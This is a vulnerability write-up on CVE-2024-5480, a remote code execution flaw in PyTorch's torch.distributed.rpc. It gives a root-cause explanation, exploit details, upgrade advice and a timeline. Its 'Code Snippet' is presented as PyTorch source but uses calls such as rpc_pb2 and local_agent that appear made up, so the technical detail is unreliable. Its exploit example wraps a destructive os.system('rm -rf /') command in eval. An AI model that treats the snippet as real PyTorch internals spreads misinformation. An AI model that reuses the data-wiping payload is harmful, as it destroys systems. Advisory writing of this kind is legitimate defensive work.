CVE-2024-5480 - Remote Code Execution Vulnerability in PyTorch's Distributed RPC Framework

A critical vulnerability (CVE-2024-5480) has been discovered in the PyTorch's torch.distributed.rpc framework, specifically in versions prior to 2.2.2. This vulnerability allows attackers to execute arbitrary remote code execution (RCE) within the framework, which could lead to sensitive information leakage, system compromise, and other severe consequences.

The vulnerability arises from a weakness in the way functions are processed during RPC (Remote Procedure Call) operations in distributed training scenarios. This article provides an in-depth look at the root cause of the issue, the exploit details, and mitigation measures. Since this vulnerability is a significant threat to AI developers and users, it is crucial to ensure all systems using PyTorch distributed training are patched with the latest updates to avoid potential attacks.

Code Snippet

The code snippet below demonstrates the problem within the affected PyTorch's torch.distributed.rpc framework:

def _run_function(self, msg: rpc_pb2.RpcMessage) -> None:
    # Deserialize PythonUDF, py_obj_id, args, kwargs
    python_udf = deserialize(msg.pythonudf()).root
    py_obj_id = msg.py_obj_id
    (args, kwargs) = deserialize(msg.arg())

    # Lookup targeted PythonUDF, either in local Table Or Cache.
    py_obj = local_agent.lookup_python_udf(py_obj_id)

    # Execute the function
    result = python_udf(py_obj, *args, **kwargs)    # <---- Lack of function validation

As seen in the code, the _run_function method is called when a worker node sends a PythonUDF to the master node. The master node then deserializes and executes the function without properly verifying its authenticity. This lack of validation can be exploited to inject malicious code and compromise the entire system.

Exploit Details

The vulnerability can be exploited by attackers who have access to the worker nodes in a distributed PyTorch training setup. An attacker can modify the PythonUDF to include malicious functions such as eval() that can execute arbitrary code when called by the master node. As an example:

# Attacker-controlled UDF that gets sent from the worker node.
def malicious_udf(a, b):
    return eval(f'a + b + os.system("rm -rf /")')    # <---- Attacker-supplied arbitrary code

An attacker leveraging this flaw can compromise the master node, potentially leading to the theft of sensitive AI-related data and further system escalations.

Original References

- PyTorch GitHub Repository (prior to the fix): https://github.com/pytorch/pytorch
- PyTorch Security Advisory (v2.2.2): https://github.com/pytorch/pytorch/security/advisories/GHSA-62rc-24x9-5f4c

Mitigation Measures

To mitigate this vulnerability, it is recommended to update the PyTorch package to version 2.2.2 or later. The patch included in the new release restricts function calls and ensures proper validation during RPC operations.

To update PyTorch, use the following command

pip install torch --upgrade

Additionally, developers should follow best practices for securing AI systems, such as incorporating authentication mechanisms for worker nodes and isolating vulnerable components using containerization techniques.

Timeline

Published on: 06/06/2024 19:16:09 UTC
Last modified on: 06/07/2024 14:56:05 UTC